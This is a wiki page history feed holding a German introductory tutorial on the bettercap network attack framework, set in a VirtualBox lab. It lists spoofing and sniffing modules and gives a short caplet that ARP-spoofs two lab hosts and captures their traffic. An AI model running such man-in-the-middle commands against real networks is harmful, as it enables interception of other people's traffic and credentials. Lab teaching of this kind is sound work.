https://wiki.ixheim.de/index.php?action=history&feed=atom&title=Bettercap_Einf%C3%BChrung
Bettercap Einführung - Versionsgeschichte
2026-06-28T20:32:11Z
Versionsgeschichte dieser Seite in Xinux Wiki
MediaWiki 1.35.1
https://wiki.ixheim.de/index.php?title=Bettercap_Einf%C3%BChrung&diff=69930&oldid=prev
Thomas.will: Die Seite wurde neu angelegt: „= bettercap = bettercap ist ein modulares, erweiterbares Framework für Netzwerk-Angriffe und -Analyse. Es ersetzt das ältere ettercap und unterstützt ARP Sp…“
2026-05-11T15:18:12Z
<p>Die Seite wurde neu angelegt: „= bettercap = bettercap ist ein modulares, erweiterbares Framework für Netzwerk-Angriffe und -Analyse. Es ersetzt das ältere ettercap und unterstützt ARP Sp…“</p>
<p><b>Neue Seite</b></p><div>= bettercap =<br />
bettercap ist ein modulares, erweiterbares Framework für Netzwerk-Angriffe und -Analyse. Es ersetzt das ältere ettercap und unterstützt ARP Spoofing, DNS Spoofing, HTTPS MITM, WiFi-Angriffe und mehr.<br />
<br />
== Installation ==<br />
sudo apt install bettercap<br />
<br />
== Start ==<br />
sudo bettercap -iface eth0<br />
<br />
== Grundbedienung ==<br />
;Hilfe anzeigen<br />
help<br />
;Hilfe zu einem Modul<br />
help arp.spoof<br />
;Aktive Module anzeigen<br />
active<br />
;Variable setzen<br />
set NAME WERT<br />
;Variable abfragen<br />
get NAME<br />
;Alle Variablen anzeigen<br />
get *<br />
;Shell-Befehl ausführen<br />
! whoami<br />
;Beenden<br />
quit<br />
<br />
== Module ==<br />
{| class="wikitable"<br />
|-<br />
! Modul !! Beschreibung<br />
|-<br />
| arp.spoof || ARP Spoofing / MITM<br />
|-<br />
| dns.spoof || DNS Antworten fälschen<br />
|-<br />
| net.recon || Hosts im Netz erkennen<br />
|-<br />
| net.probe || Aktives Probing<br />
|-<br />
| net.sniff || Pakete mitschneiden<br />
|-<br />
| http.proxy || HTTP Proxy / MITM<br />
|-<br />
| https.proxy || HTTPS Proxy / MITM<br />
|-<br />
| wifi || WiFi Reconnaissance und Angriffe<br />
|-<br />
| dhcp6.spoof || DHCPv6 Spoofing<br />
|-<br />
| ndp.spoof || NDP Spoofing (IPv6)<br />
|}<br />
<br />
== Netzwerk scannen ==<br />
;Hosts entdecken<br />
net.recon on<br />
net.probe on<br />
;Hosts anzeigen<br />
net.show<br />
<br />
== Caplets ==<br />
;Bettercap kann Befehlssequenzen aus einer Datei laden<br />
sudo bettercap -iface eth0 -caplet ./mein-angriff.cap<br />
;Beispiel caplet<br />
set arp.spoof.targets 192.168.16.131,192.168.16.132<br />
set arp.spoof.internal true<br />
set arp.spoof.fullduplex true<br />
arp.spoof on<br />
net.sniff on<br />
<br />
== Hinweis zur Netzwerkumgebung ==<br />
* Getestet mit VirtualBox '''Internal Network'''<br />
* Bei '''Bridge-Adapter''' kann das Gateway ARP-Replies überschreiben<br />
* Empfehlung für das Labor: VirtualBox Internal Network verwenden<br />
<br />
== Anwendungen ==<br />
* [[ARP Spoofing mit bettercap]]<br />
* [[DNS Spoofing mit bettercap]]<br />
* [[HTTPS MITM mit bettercap]]<br />
* [[WiFi Deauth mit bettercap]]<br />
* [[Web Spoofing mit bettercap]]</div>
Thomas.will